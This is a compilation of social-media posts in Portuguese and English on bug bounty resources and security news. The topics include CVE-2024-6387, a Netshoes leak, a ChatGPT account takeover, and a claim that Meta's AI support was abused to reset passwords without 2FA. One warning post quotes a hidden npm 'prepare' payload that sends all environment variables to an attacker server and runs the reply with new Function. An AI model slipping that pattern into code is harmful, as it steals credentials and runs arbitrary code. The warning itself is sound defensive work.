conteúdos que leio que melhoraram MUITO meu bug Bounty/Pentest
melhores reports reunidos por um hacker ref no Brasil:
https://t.co/2Ku47OC4ZB
pensamento MUITO fora da caixa, absurdo:
https://t.co/qNyecj4mHw
roadmap e dicas:
https://t.co/pgW0oQCQXz (https://t.co/wbn9xudryT)
It’s likely because there was a massive Instagram / Meta exploit over the weekend that was just patched.
Basically the Meta AI support is garbage and has lots of access perms which allowed you to reset passwords to any user without 2FA and did not verify who you are.
Telegram channels on Instagram offering IG black market services made lots of $$$
⚠️ Devs, parem tudo e leiam. Quase rodei malware na minha máquina agora mesmo e quero que vocês saibam exatamente como funciona o golpe.
Recebi um link de um repo no GitHub: um "MVP" de um projeto web3/poker, com pedido pra clonar e rodar localmente. Visual de teste técnico, daqueles que recruiter manda. Antes de tocar em qualquer coisa, parei e li o código pelo próprio GitHub, sem clonar.
Bem que desconfiei. Era malware. E não um qualquer — tinha DOIS payloads que executam SOZINHOS, sem você rodar nada explicitamente.
🎯 Payload 1 — dispara no `npm install`
O `package.json` tinha `"prepare": "node server/server.js"`. O detalhe maldoso: o script `prepare` roda AUTOMÁTICO toda vez que você dá `npm install`. Dentro dele, escondido nas rotas do servidor, um:
`https://t.co/EHtEFLu5Yg(url, { ...process.env })`
Ou seja: ele empacota TODAS as suas variáveis de ambiente — chaves de AWS, tokens de API, secrets, seed phrase de carteira cripto — e manda pro servidor do atacante. E não para aí: a RESPOSTA do servidor é passada pra `new Function("require", resposta)(require)`. Isso é execução de código arbitrário, com acesso total ao Node: filesystem, child_process, rede. Ele pode roubar suas chaves SSH, instalar persistência, o que quiser.
A URL do atacante? Escondida em base64 no `.env`, decodificando pra um domínio na Vercel. Disfarce em cima de disfarce.
⚠️ Brazil under dual attack.
Water Saci is spreading a banking trojan through a WhatsApp-based worm, while RelayNFC is running an Android NFC relay campaign that steals contactless payment data.
Both threats use social engineering and target Brazilian users.
🔗 Read details: https://t.co/e56AiAzadP
Full technical breakdown as to why Crowdstrike's update caused a worldwide BSOD – crashing computers at Airports, Banks, Casinos, 911, Hospitals and more. 🧵
(1/n)
📡Netshoes: vazamento de 38 milhões de clientes
O ecommerce brasileiro de artigos esportivos Netshoes sofreu um suposto vazamento de dados na manhã desta quarta-feira (17)
Sample 👇
A lot of you guys needed me to share my learnings, resources & experiences. I have tried my best to include possibly every good and bad that I faced in my 12 month journey into bb in this blog, emotionally & stat*lly.
🔗 Link: https://t.co/wlzn2EfATZ
#bugbountytips#BugBounty
Hello fellow hackers,
I'm excited to share my recent bug bounty writeup on how I chained an HTML Injection to a critical SSRF.
You can find the write-up linked below
https://t.co/DReSg24YuW
#bugbountytips#bugbountytip#BugBounty#websecurity
CVE-2024-6387: Unauth RCE in OpenSSH 🔥
The vulnerability, discovered by Qualys researchers, allows an attacker to perform RCE on any OpenSSH server.
Search at https://t.co/z0h36Bd4rQ:
👉🏻 Link: https://t.co/AYprRyIwfY
#cybersecurity#vulnerability_map#openssh
📢Free online tool for gathering info about URL:
- 🔗https://t.co/h6flFyr6Zx
- screenshot
- SSL certificates
- IP addresses
- title/body text
- cookies
- technologies
- http requests
- headers
- console messages
- metatags
and more.
#bugbounty#bugbountytips
Quando eu comecei em cybersec eu achei um pouco díficil encontrar conteúdo BOM sobre. Testei muitos cursos, plataformas, roadmaps mas sem dúvidas tenho meu veredito para quem quer conteúdo bom e pagando pouco
Hoje vou falar sobre a HackTheBox Academy!
1/20 #bolhasec#bolhadev
Let's rewind to this good news 👇
Bugcrowd is now a payment option on https://t.co/ZFdx9a9gvI, offering faster payments and more flexibility for bug hunters. 💸
Update your payment preferences in your profile settings to start using Bugcrowd. https://t.co/QlfldNNNJW
The team at @OpenAI just fixed a critical account takeover vulnerability I reported few hours ago affecting #ChatGPT.
It was possible to takeover someone's account, view their chat history, and access their billing information without them ever realizing it.
Breakdown below 👇